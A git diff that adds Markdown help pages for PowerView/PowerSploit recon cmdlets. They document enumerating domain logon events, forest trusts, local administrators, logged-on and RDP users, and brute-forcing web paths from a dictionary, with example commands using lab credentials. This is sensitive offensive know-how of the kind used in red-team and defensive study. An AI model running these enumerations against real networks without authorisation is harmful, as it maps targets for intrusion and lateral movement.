+## OUTPUTS
+
+### PowerView.User
+
+Custom PSObject with translated user property fields.
+
+PowerView.User.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainUserEvent.md b/docs/Recon/Get-DomainUserEvent.md new file mode 100755 index 0000000..c844981 --- /dev/null +++ b/docs/Recon/Get-DomainUserEvent.md @@ -0,0 +1,144 @@ +# Get-DomainUserEvent
+
+## SYNOPSIS
+Enumerate account logon events (ID 4624) and Logon with explicit credential
+events (ID 4648) from the specified host (default of the localhost).
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-DomainUserEvent [[-ComputerName] <String[]>] [-StartTime <DateTime>] [-EndTime <DateTime>]
+ [-MaxEvents <Int32>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function uses an XML path filter passed to Get-WinEvent to retrieve
+security events with IDs of 4624 (logon events) or 4648 (explicit credential
+logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).
+A maximum of -MaxEvents (default of 5000) are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUserEvent
+```
+
+Return logon events on the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))
+```
+
+Return all logon events from the last 3 days from every domain controller in the current domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000
+
+Return a max of 1000 logon events from the specified machine using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the computer name to retrieve events from, default of localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: dnshostname, HostName, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -StartTime
+The \[DateTime\] object representing the start of when to collect events.
+Default of \[DateTime\]::Now.AddDays(-1).
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now.AddDays(-1)
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -EndTime
+The \[DateTime\] object representing the end of when to collect events.
+Default of \[DateTime\]::Now.
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -MaxEvents
+The maximum number of events to retrieve.
+Default of 5000.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 5000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target computer.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogonEvent
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
diff --git a/docs/Recon/Get-Forest.md b/docs/Recon/Get-Forest.md new file mode 100755 index 0000000..51ddef6 --- /dev/null +++ b/docs/Recon/Get-Forest.md @@ -0,0 +1,80 @@ +# Get-Forest
+
+## SYNOPSIS
+Returns the forest object for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertTo-SID
+
+## SYNTAX
+
+```
+Get-Forest [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
+forest or the forest specified with -Forest X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Forest -Forest external.domain
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Forest -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+The forest name to query for, defaults to the current forest.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target forest.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
+to the forest root domain SID.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ForestDomain.md b/docs/Recon/Get-ForestDomain.md new file mode 100755 index 0000000..d755c0c --- /dev/null +++ b/docs/Recon/Get-ForestDomain.md @@ -0,0 +1,82 @@ +# Get-ForestDomain
+
+## SYNOPSIS
+Return all domains for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestDomain [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns all domains for the current forest or the forest specified
+by -Forest X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestDomain
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ForestDomain -Forest external.local
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestDomain -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest name to query for domains.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target forest.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.Domain
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ForestGlobalCatalog.md b/docs/Recon/Get-ForestGlobalCatalog.md new file mode 100755 index 0000000..c6da4bd --- /dev/null +++ b/docs/Recon/Get-ForestGlobalCatalog.md @@ -0,0 +1,78 @@ +# Get-ForestGlobalCatalog
+
+## SYNOPSIS
+Return all global catalogs for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestGlobalCatalog [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns all global catalogs for the current forest or the forest specified
+by -Forest X by using Get-Forest to retrieve the specified forest object
+and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestGlobalCatalog
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestGlobalCatalog -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest name to query for global catalogs.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.GlobalCatalog
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ForestTrust.md b/docs/Recon/Get-ForestTrust.md new file mode 100755 index 0000000..0ff5e3d --- /dev/null +++ b/docs/Recon/Get-ForestTrust.md @@ -0,0 +1,91 @@ +# Get-ForestTrust
+
+## SYNOPSIS
+Return all forest trusts for the current forest or a specified forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestTrust [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate domain trust relationships for the current (or a remote)
+forest using number of method using the .NET method GetAllTrustRelationships() on a
+System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestTrust
+```
+
+Return current forest trusts.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ForestTrust -Forest "external.local"
+```
+
+Return trusts for the "external.local" forest.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestTrust -Forest "external.local" -Credential $Cred
+
+Return trusts for the "external.local" forest using the specified alternate credenitals.
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest to query for trusts, defaults to the current forest.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md new file mode 100755 index 0000000..4311983 --- /dev/null +++ b/docs/Recon/Get-HttpStatus.md @@ -0,0 +1,106 @@ +# Get-HttpStatus
+
+## SYNOPSIS
+Returns the HTTP Status Codes and full URL for specified paths.
+
+PowerSploit Function: Get-HttpStatus
+Author: Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL]
+```
+
+## DESCRIPTION
+A script to check for the existence of a path or file on a webserver.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
+```
+
+## PARAMETERS
+
+### -Target
+Specifies the remote web host either by IP or hostname.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remost host.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: .\Dictionaries\admin.txt
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Port
+Specifies the port to connect to.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UseSSL
+Use an SSL connection.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
+
+## RELATED LINKS
+
+[http://obscuresecurity.blogspot.com
+http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]()
+
diff --git a/docs/Recon/Get-NetComputerSiteName.md b/docs/Recon/Get-NetComputerSiteName.md new file mode 100755 index 0000000..1a3a964 --- /dev/null +++ b/docs/Recon/Get-NetComputerSiteName.md @@ -0,0 +1,89 @@ +# Get-NetComputerSiteName
+
+## SYNOPSIS
+Returns the AD site where the local (or a remote) machine resides.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetComputerSiteName [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will use the DsGetSiteName Win32API call to look up the
+name of the site where a specified computer resides.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
+```
+
+Returns the site for WINDOWS1.testlab.local.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer | Get-NetComputerSiteName
+```
+
+Returns the sites for every machine in AD.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to check the site for (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ComputerSite
+
+A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-NetLocalGroup.md b/docs/Recon/Get-NetLocalGroup.md new file mode 100755 index 0000000..29ac4d6 --- /dev/null +++ b/docs/Recon/Get-NetLocalGroup.md @@ -0,0 +1,132 @@ +# Get-NetLocalGroup
+
+## SYNOPSIS
+Enumerates the local groups on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Get-NetLocalGroup [[-ComputerName] <String[]>] [-Method <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate the names and descriptions for the
+local groups on the current, or remote, machine.
+By default, the Win32 API
+call NetLocalGroupEnum will be used (for speed).
+Specifying "-Method WinNT"
+causes the WinNT service provider to be used instead, which returns group
+SIDs along with the group names and descriptions/comments.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLocalGroup
+```
+
+ComputerName GroupName Comment
+------------ --------- -------
+WINDOWS1 Administrators Administrators have comple...
+WINDOWS1 Backup Operators Backup Operators can overr...
+WINDOWS1 Cryptographic Operators Members are authorized to ...
+...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLocalGroup -Method Winnt
+```
+
+ComputerName GroupName GroupSID Comment
+------------ --------- -------- -------
+WINDOWS1 Administrators S-1-5-32-544 Administrators hav...
+WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c...
+WINDOWS1 Cryptographic Opera...
+S-1-5-32-569 Members are author...
+...
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-NetLocalGroup -ComputerName primary.testlab.local
+```
+
+ComputerName GroupName Comment
+------------ --------- -------
+primary.testlab.local Administrators Administrators have comple...
+primary.testlab.local Users Users are prevented from m...
+primary.testlab.local Guests Guests have the same acces...
+primary.testlab.local Print Operators Members can administer dom...
+primary.testlab.local Backup Operators Backup Operators can overr...
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to a remote machine.
+Only applicable with "-Method WinNT".
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroup.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroup.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx)
+
diff --git a/docs/Recon/Get-NetLocalGroupMember.md b/docs/Recon/Get-NetLocalGroupMember.md new file mode 100755 index 0000000..302302b --- /dev/null +++ b/docs/Recon/Get-NetLocalGroupMember.md @@ -0,0 +1,212 @@ +# Get-NetLocalGroupMember
+
+## SYNOPSIS
+Enumerates members of a specific local group on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Convert-ADName
+
+## SYNTAX
+
+```
+Get-NetLocalGroupMember [[-ComputerName] <String[]>] [-GroupName <String>] [-Method <String>]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate the members of a specified local group on the
+current, or remote, machine.
+By default, the Win32 API call NetLocalGroupGetMembers
+will be used (for speed).
+Specifying "-Method WinNT" causes the WinNT service provider
+to be used instead, which returns a larger amount of information.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLocalGroupMember | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLocalGroupMember -Method winnt | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-NetLocalGroup | Get-NetLocalGroupMember | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25...
+False False
+WINDOWS1 IIS_IUSRS NT AUTHORIT...
+S-1-5-17 False False
+WINDOWS1 Users NT AUTHORIT...
+S-1-5-4 False False
+WINDOWS1 Users NT AUTHORIT...
+S-1-5-11 False False
+WINDOWS1 Users WINDOWS1\lo...
+S-1-5-21-25...
+False UNKNOWN
+WINDOWS1 Users TESTLAB\Dom...
+S-1-5-21-89...
+True UNKNOWN
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+primary.tes...
+Administrators TESTLAB\Adm...
+S-1-5-21-89...
+False False
+primary.tes...
+Administrators TESTLAB\loc...
+S-1-5-21-89...
+False False
+primary.tes...
+Administrators TESTLAB\Ent...
+S-1-5-21-89...
+True False
+primary.tes...
+Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True False
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GroupName
+The local group name to query for users.
+If not given, it defaults to "Administrators".
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to a remote machine.
+Only applicable with "-Method WinNT".
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroupMember.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx)
+
diff --git a/docs/Recon/Get-NetLoggedon.md b/docs/Recon/Get-NetLoggedon.md new file mode 100755 index 0000000..024d1b2 --- /dev/null +++ b/docs/Recon/Get-NetLoggedon.md @@ -0,0 +1,100 @@ +# Get-NetLoggedon
+
+## SYNOPSIS
+Returns users logged on the local (or a remote) machine.
+Note: administrative rights needed for newer Windows OSes.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetLoggedon [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetWkstaUserEnum Win32API call to query
+a given host for actively logged on users.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLoggedon
+```
+
+Returns users actively logged onto the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLoggedon -ComputerName sqlserver
+```
+
+Returns users actively logged onto the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-NetLoggedon
+```
+
+Returns all logged on users for all computers in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for logged on users (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LoggedOnUserInfo
+
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
diff --git a/docs/Recon/Get-NetRDPSession.md b/docs/Recon/Get-NetRDPSession.md new file mode 100755 index 0000000..ff18322 --- /dev/null +++ b/docs/Recon/Get-NetRDPSession.md @@ -0,0 +1,104 @@ +# Get-NetRDPSession
+
+## SYNOPSIS
+Returns remote desktop/session information for the local (or a remote) machine.
+
+Note: only members of the Administrators or Account Operators local group
+can successfully execute this functionality on a remote target.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetRDPSession [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
+Win32API calls to query a given RDP remote service for active sessions and originating
+IPs.
+This is a replacement for qwinsta.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetRDPSession
+```
+
+Returns active RDP/terminal sessions on the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetRDPSession -ComputerName "sqlserver"
+```
+
+Returns active RDP/terminal sessions on the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainController | Get-NetRDPSession
+```
+
+Returns active RDP/terminal sessions on all domain controllers.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetRDPSession -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for active sessions (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.RDPSessionInfo
+
+A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,
+with the ComputerName added.
+
+## NOTES
+
